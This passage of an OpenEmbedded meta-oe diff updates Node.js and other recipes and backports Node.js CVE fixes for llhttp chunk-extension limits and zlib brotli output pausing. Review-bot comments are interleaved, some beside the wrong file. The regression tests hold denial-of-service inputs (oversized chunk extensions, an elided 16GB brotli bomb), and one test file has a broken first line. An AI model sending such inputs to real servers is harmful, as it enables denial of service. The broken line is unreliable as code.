s_n_llhttp__internal__n_chunk_parameters_ows; ++ } ++ switch (*p) { ++ case ' ': { ++ p++; ++ goto s_n_llhttp__internal__n_chunk_parameters_ows; ++ } ++ default: { ++ goto s_n_llhttp__internal__n_span_start_llhttp__on_chunk_parameters; ++ } ++ } ++ /* UNREACHABLE */; ++ abort(); ++ } + case s_n_llhttp__internal__n_chunk_size_otherwise: + s_n_llhttp__internal__n_chunk_size_otherwise: { + if (p == endp) { +@@ -9319,13 +9399,9 @@ static llparse_state_t llhttp__internal__run( + p++; + goto s_n_llhttp__internal__n_chunk_size_almost_done; + } +- case ' ': { +- p++; +- goto s_n_llhttp__internal__n_chunk_parameters; +- } + case ';': { + p++; +- goto s_n_llhttp__internal__n_chunk_parameters; ++ goto s_n_llhttp__internal__n_chunk_parameters_ows; + } + default: { + goto s_n_llhttp__internal__n_error_7; +@@ -13951,6 +14027,24 @@ static llparse_state_t llhttp__internal__run( + /* UNREACHABLE */; + abort(); + } ++ s_n_llhttp__internal__n_span_end_llhttp__on_chunk_parameters: { ++ const unsigned char* start; ++ int err; ++ ++ start = state->_span_pos0; ++ state->_span_pos0 = NULL; ++ err = llhttp__on_chunk_parameters(state, start, p); ++ if (err != 0) { ++ state->error = err; ++ state->error_pos = (const char*) (p + 1); ++ state->_current = (void*) (intptr_t) s_n_llhttp__internal__n_chunk_size_almost_done; ++ return s_error; ++ } ++ p++; ++ goto s_n_llhttp__internal__n_chunk_size_almost_done; ++ /* UNREACHABLE */; ++ abort(); ++ } + s_n_llhttp__internal__n_error_6: { + state->error = 0x2; + state->reason = "Invalid character in chunk parameters"; +diff --git a/doc/api/errors.md b/doc/api/errors.md +index dcf8744..a76bfe5 100644 +--- a/doc/api/errors.md ++++ b/doc/api/errors.md +@@ -3043,6 +3043,18 @@ malconfigured clients, if more than 8 KiB of HTTP header data is received then + HTTP parsing will abort without a request or response object being created, and + an `Error` with this code will be emitted. 
+ ++<a id="HPE_CHUNK_EXTENSIONS_OVERFLOW"></a> ++ ++### `HPE_CHUNK_EXTENSIONS_OVERFLOW` ++ ++<!-- YAML ++added: REPLACEME ++--> ++ ++Too much data was received for a chunk extensions. In order to protect against ++malicious or malconfigured clients, if more than 16 KiB of data is received ++then an `Error` with this code will be emitted. ++ + <a id="HPE_UNEXPECTED_CONTENT_LENGTH"></a> + + ### `HPE_UNEXPECTED_CONTENT_LENGTH` +diff --git a/lib/_http_server.js b/lib/_http_server.js +index 4e23266..263bb52 100644 +--- a/lib/_http_server.js ++++ b/lib/_http_server.js +@@ -706,6 +706,11 @@ const requestHeaderFieldsTooLargeResponse = Buffer.from( + `HTTP/1.1 431 ${STATUS_CODES[431]}\r\n` + + 'Connection: close\r\n\r\n', 'ascii' + ); ++const requestChunkExtensionsTooLargeResponse = Buffer.from( ++ `HTTP/1.1 413 ${STATUS_CODES[413]}\r\n` + ++ 'Connection: close\r\n\r\n', 'ascii', ++); ++ + function socketOnError(e) { + // Ignore further errors + this.removeListener('error', socketOnError); +@@ -719,6 +724,9 @@ function socketOnError(e) { + case 'HPE_HEADER_OVERFLOW': + response = requestHeaderFieldsTooLargeResponse; + break; ++ case 'HPE_CHUNK_EXTENSIONS_OVERFLOW': ++ response = requestChunkExtensionsTooLargeResponse; ++ break; + case 'ERR_HTTP_REQUEST_TIMEOUT': + response = requestTimeoutResponse; + break; +diff --git a/src/node_http_parser.cc b/src/node_http_parser.cc +index 74f3248..b92e848 100644 +--- a/src/node_http_parser.cc ++++ b/src/node_http_parser.cc +@@ -79,6 +79,8 @@ const uint32_t kOnExecute = 5; + const uint32_t kOnTimeout = 6; + // Any more fields than this will be flushed into JS + const size_t kMaxHeaderFieldsCount = 32; ++// Maximum size of chunk extensions ++const size_t kMaxChunkExtensionsSize = 16384; + + const uint32_t kLenientNone = 0; + const uint32_t kLenientHeaders = 1 << 0; +@@ -206,6 +208,7 @@ class Parser : public AsyncWrap, public StreamListener { + + int on_message_begin() { + num_fields_ = num_values_ = 0; ++ chunk_extensions_nread_ = 0; + 
url_.Reset(); + status_message_.Reset(); + header_parsing_start_time_ = uv_hrtime(); +@@ -443,9 +446,22 @@ class Parser : public AsyncWrap, public StreamListener { + return 0; + } + +- // Reset nread for the next chunk ++ int on_chunk_extension(const char* at, size_t length) { ++ chunk_extensions_nread_ += length; ++ ++ if (chunk_extensions_nread_ > kMaxChunkExtensionsSize) { ++ llhttp_set_error_reason(&parser_, ++ "HPE_CHUNK_EXTENSIONS_OVERFLOW:Chunk extensions overflow"); ++ return HPE_USER; ++ } ++ ++ return 0; ++ } ++ ++ // Reset nread for the next chunk and also reset the extensions counter + int on_chunk_header() { + header_nread_ = 0; ++ chunk_extensions_nread_ = 0; + return 0; + } + +@@ -887,6 +903,7 @@ class Parser : public AsyncWrap, public StreamListener { + const char* current_buffer_data_; + bool pending_pause_ = false; + uint64_t header_nread_ = 0; ++ uint64_t chunk_extensions_nread_ = 0; + uint64_t max_http_header_size_; + uint64_t headers_timeout_; + uint64_t header_parsing_start_time_ = 0; +@@ -921,6 +938,7 @@ const llhttp_settings_t Parser::settings = { + Proxy<DataCall, &Parser::on_header_field>::Raw, + Proxy<DataCall, &Parser::on_header_value>::Raw, + Proxy<Call, &Parser::on_headers_complete>::Raw, ++ Proxy<DataCall, &Parser::on_chunk_extension>::Raw, + Proxy<DataCall, &Parser::on_body>::Raw, + Proxy<Call, &Parser::on_message_complete>::Raw, + Proxy<Call, &Parser::on_chunk_header>::Raw, +diff --git a/test/parallel/test-http-chunk-extensions-limit.js b/test/parallel/test-http-chunk-extensions-limit.js +new file mode 100644 +index 0000000..6868b3d +--- /dev/null ++++ b/test/parallel/test-http-chunk-extensions-limit.js +@@ -0,0 +1,131 @@ ++'use strict'; ++ ++const common = require('../common'); ++const http = require('http'); ++const net = require('net'); ++const assert = require('assert'); ++ ++// Verify that chunk extensions are limited in size when sent all together. 
++{ ++ const server = http.createServer((req, res) => { ++ req.on('end', () => { ++ res.writeHead(200, { 'Content-Type': 'text/plain' }); ++ res.end('bye'); ++ }); ++ ++ req.resume(); ++ }); ++ ++ server.listen(0, () => { ++ const sock = net.connect(server.address().port); ++ let data = ''; ++ ++ sock.on('data', (chunk) => data += chunk.toString('utf-8')); ++ ++ sock.on('end', common.mustCall(function() { ++ assert.strictEqual(data, 'HTTP/1.1 413 Payload Too Large\r\nConnection: close\r\n\r\n'); ++ server.close(); ++ })); ++ ++ sock.end('' + ++ 'GET / HTTP/1.1\r\n' + ++ 'Host: localhost:8080\r\n' + ++ 'Transfer-Encoding: chunked\r\n\r\n' + ++ '2;' + 'A'.repeat(20000) + '=bar\r\nAA\r\n' + ++ '0\r\n\r\n' ++ ); ++ }); ++} ++ ++// Verify that chunk extensions are limited in size when sent in intervals. ++{ ++ const server = http.createServer((req, res) => { ++ req.on('end', () => { ++ res.writeHead(200, { 'Content-Type': 'text/plain' }); ++ res.end('bye'); ++ }); ++ ++ req.resume(); ++ }); ++ ++ server.listen(0, () => { ++ const sock = net.connect(server.address().port); ++ let remaining = 20000; ++ let data = ''; ++ ++ const interval = setInterval( ++ () => { ++ if (remaining > 0) { ++ sock.write('A'.repeat(1000)); ++ } else { ++ sock.write('=bar\r\nAA\r\n0\r\n\r\n'); ++ clearInterval(interval); ++ } ++ ++ remaining -= 1000; ++ }, ++ common.platformTimeout(20), ++ ).unref(); ++ ++ sock.on('data', (chunk) => data += chunk.toString('utf-8')); ++ ++ sock.on('end', common.mustCall(function() { ++ assert.strictEqual(data, 'HTTP/1.1 413 Payload Too Large\r\nConnection: close\r\n\r\n'); ++ server.close(); ++ })); ++ ++ sock.write('' + ++ 'GET / HTTP/1.1\r\n' + ++ 'Host: localhost:8080\r\n' + ++ 'Transfer-Encoding: chunked\r\n\r\n' + ++ '2;' ++ ); ++ }); ++} ++ ++// Verify the chunk extensions is correctly reset after a chunk ++{ ++ const server = http.createServer((req, res) => { ++ req.on('end', () => { ++ res.writeHead(200, { 'content-type': 'text/plain', 'connection': 
'close', 'date': 'now' }); ++ res.end('bye'); ++ }); ++ ++ req.resume(); ++ }); ++ ++ server.listen(0, () => { ++ const sock = net.connect(server.address().port); ++ let data = ''; ++ ++ sock.on('data', (chunk) => data += chunk.toString('utf-8')); ++ ++ sock.on('end', common.mustCall(function() { ++ assert.strictEqual( ++ data, ++ 'HTTP/1.1 200 OK\r\n' + ++ 'content-type: text/plain\r\n' + ++ 'connection: close\r\n' + ++ 'date: now\r\n' + ++ 'Transfer-Encoding: chunked\r\n' + ++ '\r\n' + ++ '3\r\n' + ++ 'bye\r\n' + ++ '0\r\n' + ++ '\r\n', ++ ); ++ ++ server.close(); ++ })); ++ ++ sock.end('' + ++ 'GET / HTTP/1.1\r\n' + ++ 'Host: localhost:8080\r\n' + ++ 'Transfer-Encoding: chunked\r\n\r\n' + ++ '2;' + 'A'.repeat(10000) + '=bar\r\nAA\r\n' + ++ '2;' + 'A'.repeat(10000) + '=bar\r\nAA\r\n' + ++ '2;' + 'A'.repeat(10000) + '=bar\r\nAA\r\n' + ++ '0\r\n\r\n' ++ ); ++ }); ++} +diff --git a/tools/update-llhttp.sh b/tools/update-llhttp.sh +index 12e2f46..a95eef1 100755 +--- a/tools/update-llhttp.sh ++++ b/tools/update-llhttp.sh +@@ -59,5 +59,5 @@ echo "" + echo "Please git add llhttp, commit the new version:" + echo "" + echo "$ git add -A deps/llhttp" +-echo "$ git commit -m \"deps: update nghttp2 to $LLHTTP_VERSION\"" ++echo "$ git commit -m \"deps: update llhttp to $LLHTTP_VERSION\"" + echo "" +-- +2.40.0 diff --git a/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22025.patch b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22025.patch new file mode 100644 index 0000000000..ac3a54aba6 --- /dev/null +++ b/meta-oe/recipes-devtools/nodejs/nodejs/CVE-2024-22025.patch 
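Review bot: The header of CVE-2024-22019.patch tags the fix as `CVE-ID: CVE-2024-22019`, which is not the `CVE: CVE-2024-22019` trailer that OpenEmbedded patch conventions use and that the cve-check class looks for in patch text. As far as I can tell the issue is still reported as patched only because the file name contains the identifier, so a later rename or a squash into another patch would silently drop it from the CVE report. I would change the trailer to `CVE: CVE-2024-22019`. CVE-2024-22025.patch, added in the next hunk, uses the same `CVE-ID:` form and needs the same change.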
@@ -0,0 +1,148 @@ +From 9052ef43dc2d1b0db340591a9bc9e45a25c01d90 Mon Sep 17 00:00:00 2001 +From: Matteo Collina <hello@matteocollina.com> +Date: Tue, 6 Feb 2024 16:47:20 +0100 +Subject: [PATCH 4/5] zlib: pause stream if outgoing buffer is full + +Signed-off-by: Matteo Collina <hello@matteocollina.com> +PR-URL: https://github.com/nodejs-private/node-private/pull/540 +Reviewed-By: Robert Nagy <ronagy@icloud.com> +Ref: https://hackerone.com/reports/2284065 + +CVE-ID: CVE-2024-22025 + +Upstream-Status: Backport [https://github.com/nodejs/node/commit/9052ef43dc2d1b0d] + +Signed-off-by: Archana Polampalli <archana.polampalli@windriver.com> +--- + lib/zlib.js | 32 +++++++++++++++++++------- + test/parallel/test-zlib-brotli-16GB.js | 22 ++++++++++++++++++ + test/parallel/test-zlib-params.js | 24 +++++++++++-------- + 3 files changed, 61 insertions(+), 17 deletions(-) + create mode 100644 test/parallel/test-zlib-brotli-16GB.js + +diff --git a/lib/zlib.js b/lib/zlib.js +index 9bde199..8e033e5 100644 +--- a/lib/zlib.js ++++ b/lib/zlib.js +@@ -560,10 +560,11 @@ function processCallback() { + self.bytesWritten += inDelta; + + const have = handle.availOutBefore - availOutAfter; ++ let streamBufferIsFull = false; + if (have > 0) { + const out = self._outBuffer.slice(self._outOffset, self._outOffset + have); + self._outOffset += have; +- self.push(out); ++ streamBufferIsFull = !self.push(out); + } else { + assert(have === 0, 'have should not go down'); + } +@@ -588,13 +589,28 @@ function processCallback() { + handle.inOff += inDelta; + handle.availInBefore = availInAfter; + +- this.write(handle.flushFlag, +- this.buffer, // in +- handle.inOff, // in_off +- handle.availInBefore, // in_len +- self._outBuffer, // out +- self._outOffset, // out_off +- self._chunkSize); // out_len ++ if (!streamBufferIsFull) { ++ this.write(handle.flushFlag, ++ this.buffer, // in ++ handle.inOff, // in_off ++ handle.availInBefore, // in_len ++ self._outBuffer, // out ++ self._outOffset, // out_off ++ 
self._chunkSize); // out_len ++ } else { ++ const oldRead = self._read; ++ self._read = (n) => { ++ self._read = oldRead; ++ this.write(handle.flushFlag, ++ this.buffer, // in ++ handle.inOff, // in_off ++ handle.availInBefore, // in_len ++ self._outBuffer, // out ++ self._outOffset, // out_off ++ self._chunkSize); // out_len ++ self._read(n); ++ }; ++ } + return; + } + +diff --git a/test/parallel/test-zlib-brotli-16GB.js b/test/parallel/test-zlib-brotli-16GB.js +new file mode 100644 +index 0000000..1ca10f7 +--- /dev/null ++++ b/test/parallel/test-zlib-brotli-16GB.js +@@ -0,0 +1,22 @@ ++use strict'; ++ ++const common = require('../common'); ++const { createBrotliDecompress } = require('node:zlib'); ++const strictEqual = require('node:assert').strictEqual; ++ ++// This tiny HEX string is a 16GB file. ++// This test verifies that the stream actually stops. ++/* eslint-disable max-len */ ++const content = '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'; ++ ++const buf = Buffer.from(content, 'hex'); ++ ++const decoder = createBrotliDecompress(); ++decoder.end(buf); ++ ++// We need to wait to verify that the libuv thread pool had time ++// to process the data and the buffer is not empty. 
++setTimeout(common.mustCall(() => { ++ // There is only one chunk in the buffer ++ strictEqual(decoder._readableState.buffer.length, 1); ++}), common.platformTimeout(100)); +diff --git a/test/parallel/test-zlib-params.js b/test/parallel/test-zlib-params.js +index 30d4f13..18271fe 100644 +--- a/test/parallel/test-zlib-params.js ++++ b/test/parallel/test-zlib-params.js +@@ -12,23 +12,29 @@ const deflater = zlib.createDeflate(opts); + const chunk1 = file.slice(0, chunkSize); + const chunk2 = file.slice(chunkSize); + const blkhdr = Buffer.from([0x00, 0x5a, 0x82, 0xa5, 0x7d]); +-const expected = Buffer.concat([blkhdr, chunk2]); +-let actual; ++const blkftr = Buffer.from('010000ffff7dac3072', 'hex'); ++const expected = Buffer.concat([blkhdr, chunk2, blkftr]); ++const bufs = []; ++ ++function read() { ++ let buf; ++ while ((buf = deflater.read()) !== null) { ++ bufs.push(buf); ++ } ++} + + deflater.write(chunk1, function() { + deflater.params(0, zlib.constants.Z_DEFAULT_STRATEGY, function() { + while (deflater.read()); +- deflater.end(chunk2, function() { +- const bufs = []; +- let buf; +- while ((buf = deflater.read()) !== null) +- bufs.push(buf); +- actual = Buffer.concat(bufs); +- }); ++ ++ deflater.on('readable', read); ++ ++ deflater.end(chunk2); + }); + while (deflater.read()); + }); + + process.once('exit', function() { ++ const actual = Buffer.concat(bufs); + assert.deepStrictEqual(actual, expected); + }); +-- +2.40.0 diff --git a/meta-oe/recipes-devtools/nodejs/nodejs_16.14.2.bb b/meta-oe/recipes-devtools/nodejs/nodejs_16.20.2.bb index 62188f94a7..95b36c926d 100644 --- a/meta-oe/recipes-devtools/nodejs/nodejs_16.14.2.bb +++ b/meta-oe/recipes-devtools/nodejs/nodejs_16.20.2.bb 
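Review bot: The new test file test/parallel/test-zlib-brotli-16GB.js opens with `use strict';`, missing the opening quote, so the file cannot be parsed and the regression test for the output-buffer pause never runs. The first line should be `'use strict';`. The quote was presumably lost while preparing the backport, so the rest of the file is worth comparing against the upstream commit named in Upstream-Status. This test is the only check here that the decoder stops after one buffered chunk.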
@@ -1,13 +1,13 @@ DESCRIPTION = "nodeJS Evented I/O for V8 JavaScript" HOMEPAGE = "http://nodejs.org" -LICENSE = "MIT & ISC & BSD-2-Clause & BSD-3-Clause & Artistic-2.0" -LIC_FILES_CHKSUM = "file://LICENSE;md5=6ba5b21ac7a505195ca69344d3d7a94a" +LICENSE = "MIT & ISC & BSD-2-Clause & BSD-3-Clause & Artistic-2.0 & OpenSSL" +LIC_FILES_CHKSUM = "file://LICENSE;md5=ab4d0d45e717c9978737499a3489e515" DEPENDS = "openssl" DEPENDS:append:class-target = " qemu-native" DEPENDS:append:class-native = " c-ares-native" -inherit pkgconfig python3native qemu +inherit pkgconfig python3native qemu setuptools3 COMPATIBLE_MACHINE:armv4 = "(!.*armv4).*" COMPATIBLE_MACHINE:armv5 = "(!.*armv5).*" @@ -19,17 +19,20 @@ COMPATIBLE_HOST:powerpc = "null" SRC_URI = "http://nodejs.org/dist/v${PV}/node-v${PV}.tar.xz \ file://0001-Disable-running-gyp-files-for-bundled-deps.patch \ - file://0002-Install-both-binaries-and-use-libdir.patch \ file://0004-v8-don-t-override-ARM-CFLAGS.patch \ - file://0005-add-openssl-legacy-provider-option.patch \ file://big-endian.patch \ file://mips-less-memory.patch \ file://system-c-ares.patch \ file://0001-liftoff-Correct-function-signatures.patch \ file://0001-mips-Use-32bit-cast-for-operand-on-mips32.patch \ + file://0001-Nodejs-Fixed-pipes-DeprecationWarning.patch \ + file://CVE-2022-25883.patch \ + file://CVE-2024-22019.patch \ + file://CVE-2024-22025.patch \ + file://CVE-2023-46809.patch \ " SRC_URI:append:class-target = " \ - file://0002-Using-native-binaries.patch \ + file://0001-Using-native-binaries.patch \ " SRC_URI:append:toolchain-clang:x86 = " \ file://libatomic.patch \ 
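Review bot: Adding `setuptools3` to the `inherit` line of this Node.js recipe looks unintended, and nothing in the hunk explains it. To my knowledge that class exports its own configure, compile and install steps and adds Python build and runtime dependencies, which is more than `python3native` already provides for running the build scripts. Whether the recipe overrides those tasks cannot be seen here, since they are defined outside this hunk. Please either drop the class or add a comment above the line, for example `# setuptools3: <reason it is needed>`, so the extra dependencies in the image are a documented choice.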
@@ -37,10 +40,12 @@ SRC_URI:append:toolchain-clang:x86 = " \ SRC_URI:append:toolchain-clang:powerpc64le = " \ file://0001-ppc64-Do-not-use-mminimal-toc-with-clang.patch \ " -SRC_URI[sha256sum] = "e922e215cc68eb5f94d33e8a0b61e2c863b7731cc8600ab955d3822da90ff8d1" +SRC_URI[sha256sum] = "576f1a03c455e491a8d132b587eb6b3b84651fc8974bb3638433dd44d22c8f49" S = "${WORKDIR}/node-v${PV}" +CVE_PRODUCT += "node.js" + # v8 errors out if you have set CCACHE CCACHE = "" diff --git a/meta-oe/recipes-devtools/pahole/pahole_1.22.bb b/meta-oe/recipes-devtools/pahole/pahole_1.22.bb index 449508a5d5..ec642ec3b2 100644 --- a/meta-oe/recipes-devtools/pahole/pahole_1.22.bb +++ b/meta-oe/recipes-devtools/pahole/pahole_1.22.bb @@ -21,7 +21,7 @@ inherit cmake pkgconfig PACKAGECONFIG[python3] = ",,python3-core,python3-core" -EXTRA_OECMAKE = "-D__LIB=lib -DCMAKE_BUILD_TYPE=Release -DLIBBPF_EMBEDDED=OFF" +EXTRA_OECMAKE = "-D__LIB=${@os.path.relpath(d.getVar('libdir'), d.getVar('prefix') + '/')} -DCMAKE_BUILD_TYPE=Release -DLIBBPF_EMBEDDED=OFF" FILES:${PN} = "${bindir}/pahole \ ${libdir}/libdwarves.so* \ diff --git a/meta-oe/recipes-devtools/php/php_8.1.10.bb b/meta-oe/recipes-devtools/php/php_8.1.22.bb index 624ab2621a..ffa3318441 100644 --- a/meta-oe/recipes-devtools/php/php_8.1.10.bb +++ b/meta-oe/recipes-devtools/php/php_8.1.22.bb @@ -33,7 +33,7 @@ SRC_URI:append:class-target = " \ " S = "${WORKDIR}/php-${PV}" -SRC_URI[sha256sum] = "2de8e0402285f7c56887defe651922308aded58ba60befcf3b77720209e31f10" +SRC_URI[sha256sum] = "992354e382c6c618d01ed4be06beea8dec3178b14153df64d3c8c48b85e9fbc2" CVE_CHECK_IGNORE += "\ CVE-2007-2728 \ diff --git a/meta-oe/recipes-devtools/protobuf/protobuf_3.19.4.bb b/meta-oe/recipes-devtools/protobuf/protobuf_3.19.6.bb index 5662330840..8e50054718 100644 --- a/meta-oe/recipes-devtools/protobuf/protobuf_3.19.4.bb +++ b/meta-oe/recipes-devtools/protobuf/protobuf_3.19.6.bb 
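Review bot: `CVE_PRODUCT += "node.js"` may not extend the default product name as intended. If the default comes from a weak `??=` assignment, as I believe it does in cve-check.bbclass, `+=` defines the variable as just ` node.js` and the `${BPN}` entry is lost, so CVEs filed under the `nodejs` product would no longer be matched for this recipe. Listing both names explicitly removes the dependency on the default: `CVE_PRODUCT = "nodejs node.js"`.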
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=37b5762e07f0af8c74ce80a8bda4266b" DEPENDS = "zlib" DEPENDS:append:class-target = " protobuf-native" -SRCREV = "22d0e265de7d2b3d2e9a00d071313502e7d4cccf" +SRCREV = "c9297981b7c35ad9c2bf258e7c8d786a04d13378" SRC_URI = "git://github.com/protocolbuffers/protobuf.git;branch=3.19.x;protocol=https \ file://run-ptest \ diff --git a/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb b/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb index b6ff62b91c..65294fafad 100644 --- a/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb +++ b/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb @@ -4,7 +4,7 @@ SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://license.txt;md5=ba04aa8f65de1396a7e59d1d746c2125" -SRC_URI = "git://github.com/miloyip/rapidjson.git;nobranch=1;protocol=https" +SRC_URI = "git://github.com/miloyip/rapidjson.git;branch=master;protocol=https" SRCREV = "0ccdbf364c577803e2a751f5aededce935314313" diff --git a/meta-oe/recipes-devtools/sip/sip3/added-the-py_ssize_t_clean-argument-to-the-module-directive.patch b/meta-oe/recipes-devtools/sip/sip3/added-the-py_ssize_t_clean-argument-to-the-module-directive.patch new file mode 100644 index 0000000000..d7ed0770b2 --- /dev/null +++ b/meta-oe/recipes-devtools/sip/sip3/added-the-py_ssize_t_clean-argument-to-the-module-directive.patch 
@@ -0,0 +1,17679 @@ +Added the 'py_ssize_t_clean' argument to '%Module' directive + +This is based on an upstream changeset to SIP. It was backported to +sip-4.19.23 and the parser was regenerated with the following +commands: + + cd sipgen/metasrc + flex -o../lexer.c lexer.l + bison -y -d -o ../parser.c parser.y + +Signed-off-by: Rob Woolley <rob.woolley@windriver.com> + +# HG changeset patch +# User Phil Thompson <phil@riverbankcomputing.com> +# Date 1635086052 -3600 +# Node ID 5d67349bb5a9954590a896ab35da93b2237b99c2 +# Parent d837f2a3147fc5eb364f1c54798b668da1a83333 +Added the 'py_ssize_t_clean' argument to the '%Module' directive. + +Index: sip-4.19.23/sipgen/gencode.c +=================================================================== +--- sip-4.19.23.orig/sipgen/gencode.c ++++ sip-4.19.23/sipgen/gencode.c +@@ -1138,6 +1138,12 @@ static void generateCompositeCpp(sipSpec + + declareLimitedAPI(py_debug, NULL, fp); + ++ if (isPY_SSIZE_T_CLEAN(mod)) ++ prcode(fp, ++"\n" ++"#define PY_SSIZE_T_CLEAN\n" ++ ); ++ + prcode(fp, + "\n" + "#include <Python.h>\n" +Index: sip-4.19.23/sipgen/metasrc/lexer.l +=================================================================== +--- sip-4.19.23.orig/sipgen/metasrc/lexer.l ++++ sip-4.19.23/sipgen/metasrc/lexer.l +@@ -155,6 +155,7 @@ SIP_RXOBJ_DIS {return TK_S + SIP_SLOT_CON {return TK_SIPSLOTCON;} + SIP_SLOT_DIS {return TK_SIPSLOTDIS;} + SIP_SSIZE_T {return TK_SIPSSIZET;} ++Py_ssize_t {return TK_SIPSSIZET;} + SIP_QOBJECT {return TK_QOBJECT;} + \.\.\. 
{return TK_ELLIPSIS;} + +@@ -173,6 +174,7 @@ SIP_QOBJECT {return TK_Q + <directive>timestamp {return TK_TIMESTAMP;} + <directive>type {return TK_TYPE;} + <directive>use_argument_names {return TK_USEARGNAMES;} ++<directive>py_ssize_t_clean {return TK_PYSSIZETCLEAN;} + <directive>use_limited_api {return TK_USELIMITEDAPI;} + <directive>all_raise_py_exception {return TK_ALLRAISEPYEXC;} + <directive>call_super_init {return TK_CALLSUPERINIT;} +Index: sip-4.19.23/sipgen/metasrc/parser.y +=================================================================== +--- sip-4.19.23.orig/sipgen/metasrc/parser.y ++++ sip-4.19.23/sipgen/metasrc/parser.y +@@ -182,9 +182,9 @@ static void addProperty(sipSpec *pt, mod + docstringDef *docstring); + static moduleDef *configureModule(sipSpec *pt, moduleDef *module, + const char *filename, const char *name, int c_module, KwArgs kwargs, +- int use_arg_names, int use_limited_api, int call_super_init, +- int all_raise_py_exc, const char *def_error_handler, +- docstringDef *docstring); ++ int use_arg_names, int py_ssize_t_clean, int use_limited_api, ++ int call_super_init, int all_raise_py_exc, ++ const char *def_error_handler, docstringDef *docstring); + static void addAutoPyName(moduleDef *mod, const char *remove_leading); + static KwArgs convertKwArgs(const char *kwargs); + static void checkAnnos(optFlags *annos, const char *valid[]); +@@ -389,6 +389,7 @@ static scopedNameDef *fullyQualifiedName + %token TK_TIMESTAMP + %token TK_TYPE + %token TK_USEARGNAMES ++%token TK_PYSSIZETCLEAN + %token TK_USELIMITEDAPI + %token TK_ALLRAISEPYEXC + %token TK_CALLSUPERINIT +@@ -1908,9 +1909,10 @@ module: TK_MODULE module_args module_bod + if (notSkipping()) + currentModule = configureModule(currentSpec, currentModule, + currentContext.filename, $2.name, $2.c_module, +- $2.kwargs, $2.use_arg_names, $2.use_limited_api, +- $2.call_super_init, $2.all_raise_py_exc, +- $2.def_error_handler, $3.docstring); ++ $2.kwargs, $2.use_arg_names, $2.py_ssize_t_clean, ++ 
$2.use_limited_api, $2.call_super_init, ++ $2.all_raise_py_exc, $2.def_error_handler, ++ $3.docstring); + } + | TK_CMODULE dottedname optnumber { + deprecated("%CModule is deprecated, use %Module and the 'language' argument instead"); +@@ -1918,7 +1920,7 @@ module: TK_MODULE module_args module_bod + if (notSkipping()) + currentModule = configureModule(currentSpec, currentModule, + currentContext.filename, $2, TRUE, defaultKwArgs, +- FALSE, FALSE, -1, FALSE, NULL, NULL); ++ FALSE, FALSE, FALSE, -1, FALSE, NULL, NULL); + } + ; + +@@ -1930,6 +1932,7 @@ module_args: dottedname {resetLexerSt + $$.kwargs = defaultKwArgs; + $$.name = $1; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -1950,6 +1953,7 @@ module_arg_list: module_arg + case TK_LANGUAGE: $$.c_module = $3.c_module; break; + case TK_NAME: $$.name = $3.name; break; + case TK_USEARGNAMES: $$.use_arg_names = $3.use_arg_names; break; ++ case TK_PYSSIZETCLEAN: $$.py_ssize_t_clean = $3.py_ssize_t_clean; break; + case TK_USELIMITEDAPI: $$.use_limited_api = $3.use_limited_api; break; + case TK_ALLRAISEPYEXC: $$.all_raise_py_exc = $3.all_raise_py_exc; break; + case TK_CALLSUPERINIT: $$.call_super_init = $3.call_super_init; break; +@@ -1965,6 +1969,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = convertKwArgs($3); + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -1983,6 +1988,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -1995,6 +2001,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = $3; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + 
$$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -2007,6 +2014,20 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = $3; ++ $$.py_ssize_t_clean = FALSE; ++ $$.use_limited_api = FALSE; ++ $$.all_raise_py_exc = FALSE; ++ $$.call_super_init = -1; ++ $$.def_error_handler = NULL; ++ } ++ | TK_PYSSIZETCLEAN '=' bool_value { ++ $$.token = TK_PYSSIZETCLEAN; ++ ++ $$.c_module = FALSE; ++ $$.kwargs = defaultKwArgs; ++ $$.name = NULL; ++ $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = $3; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -2019,6 +2040,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = $3; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -2031,6 +2053,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = $3; + $$.call_super_init = -1; +@@ -2043,6 +2066,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = $3; +@@ -2055,6 +2079,7 @@ module_arg: TK_KWARGS '=' TK_STRING_VALU + $$.kwargs = defaultKwArgs; + $$.name = NULL; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = 